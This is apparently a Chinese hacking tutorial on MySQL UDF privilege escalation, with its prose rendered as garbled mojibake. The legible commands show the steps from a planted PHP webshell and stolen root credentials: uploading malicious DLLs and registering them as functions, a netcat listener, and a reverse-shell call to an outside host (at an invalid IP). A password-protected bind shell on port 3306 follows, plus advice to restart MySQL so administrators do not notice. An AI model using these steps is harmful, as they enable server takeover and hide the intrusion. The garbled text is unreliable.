mysql¼òµ¥ÌáȨ

S- servÌáȨ·½Ê½ÈËÈ˶¼»áÓÃÁË£¬¸ãµÃÏÖÔÚµÄÖ÷»ú¶¼ÅäÖõ÷dz£°²È«£¬¿´À´¹¥»÷ÊÖ·¨µÄ²ã³ö²»ÇîÒ²ÊÇÔì³ÉÖйúÍøÂ簲ȫ½ø²½µÄÒ»´óÔ­ÒòÖ®Ò»£¬»¹ÓÐÆäËûµÄ pcanywhere»ñÈ¡ÃÜÂ룬Ìæ»»·þÎñ£¬µÈµÈ¡£µ«ÊÇÏÖÔÚҲûÕâôºÃ¸ãÁË£¬Ëæ×Å°²È«ÒâʶµÄÌá¸ß£¬Ö®Ç°µÄ·½Ê½¹À¼Æ²»Ôõô¹ÜÓã¬ÏÖÔÚÎÒ¸ø´ó¼Ò½éÉÜÒ»ÏÂÒ»ÖÖеÄÌáȨ·½Ê½£¬¿´¹ý¹ÅµäLM×öµÄÄǶ¯»­µÄÅóÓѶ¼ÖªµÀ°É£¿ÀûÓÃMYSQLlÈõ¿ÚÁîÄõ½ÏµÍ³È¨ÏÞ£¬ÔÚWEBSHELÉÏÒ²¿ÉʵÏÖ£¬²»¹ýÓиöÇ°Ìᣬ¾ÍÊÇÄ¿±êÖ÷»ú×°ÓÐ MYSQL£¬¶øÄãÓÖÖªµÀMYSQLµÄÓû§ºÍÃÜÂ룬²Å¿ÉÒÔ½øÐÐÌáȨ¡£WEBSHELL»ñµÃÁË£¬ÕÒÓû§ºÍÃÜÂëÒ²²»ÊÇʲôÄÑÊ¡£ÏÖÔÚÎÒÄÃÎÒÁíÍâһ̨»úÆ÷×öʾ·¶£¬ÒѾ­°ÑPHPSHELL´«ÉÏÈ¥ÁË,Ò»°ãÀ´ËµÁ¬½ÓMYSQLµÄÕÊ»§ÃÜÂëºÜºÃÕÒ£¬Ëæ±ã±à¼­Ò»¸öPHPÎļþ£¬¾Í¿´µ½ÁË¡£
¿´µ½ÁË°É£¬Óû§Ãû£ºroot ÃÜÂ룺123456 ¿âÃû£ºphp È»ºóÔõô°ìÄØ£¿ÏÈÓÃSQL Query ½¨Á¢Á¬½Ó£¬¹þÁ¬½Ó³É¹¦ÁË£¬ÏÖÔÚ¿ªÊ¼½«ÎÒÃǵÄÌáȨÓõ櫶«:Mix.dll My_udf.dllÉÏ´«ÉÏÈ¥ÏÈ.OK£¬´«ºÃÁË£¬Mix.dllÓÃÓÚ·´µ¯Á¬½Ó£¬My_udf.dllÊÇÕýÏòÁ¬½Ó£¬Ö±½ÓÓÃÁ¬½Ó¶Ô·½µÄ3306¶Ë¿ÚÈ»ºóÊäÈëÃÜÂë¾Í¿É»ñµÃCMDSHELL¡£ºÃ£¬²»¶à˵ÁË£¬´«ÉÏÈ¥Ö®ºóÄؾÍÖ´ÐÐÒÔÏÂSQLÓï¾ä
create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll';       //my_udf.dll
À´×¢²áº¯Êý.
³öÏÖSQLÓï¾ä³É¹¦Ö´ÐУ¡
  ÀëÄõ½CMDSHELLÒѾ­²»Ô¶ÁË£¬ÎÒÃÇÏÈÓÃNCÔÚ±¾µØ¼àÌýÒ»¸ö¶Ë¿ÚÏÈ£¬Nc -l -p 1234 £¨Õâ¸öÎÒÏë²»ÓýØͼÁË°É£©¶øºóÖ´ÐÐÓï¾ä£º
select Mixconnect('192.168.1.520','1234');
À´¼¤»îÄǸöº¯Êý£¬Ö´Ðгɹ¦£¬È»ºó¿´¿´ÎÒÃǵÄNCÓз´Ó³Ã»,³É¹¦µÃµ½CMSHELL£¬²»¹ýÕâʱ¶Ô·½µÄMYSQLÒѾ­¼ÙËÀ¿©£¬ÎÒÃÇÒª°ÑMYSQL·þÎñ½ø³Ì¸ø killµô£¬È»ºóÖØÐÂÆô¶¯MYSQL·þÎñ²ÅÐУ¬²»È»¹ÜÀíÔ±·¢ÏÖÍøÕ¾ÔËÐв»ÁËÁË£¬ÄǾ͡£¡£¡£¡£Èç¹û¸Ã·þÎñÆ÷²»ÔÊÐíÁ¬½ÓÈκÎÍⲿIPºÍ¶Ë¿Ú£¬¶øËûµÄ3306¶Ë¿ÚÈ´ÊǶÔÍ⿪µÄ£¡ÕâʱMy_udf.dll¾Í¸ÃÉϳ¡ÁË£¬Ê¹Ó÷½·¨ºÍMixÒ»Ñù£¬Á¬½ÓMYSQL³É¹¦ºóÖ´ÐÐÈçÏÂÓï¾ä£º
create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll';
Ö´ÐÐÓï¾ä³É¹¦ºó£¬È»ºóÎÒÃǾͿªÊ¼¼¤»îÕâ¸öº¯Êý£¬ÊäÈëÓï¾ä£º
select my_udfdoor ('');
È»ºóÓÃncÁ¬½Ó3306¶Ë¿Ú,È»ºóÊäÈëfuck ¾Í¿ÉÒԵõ½Ò»¸öcmdshellÁË.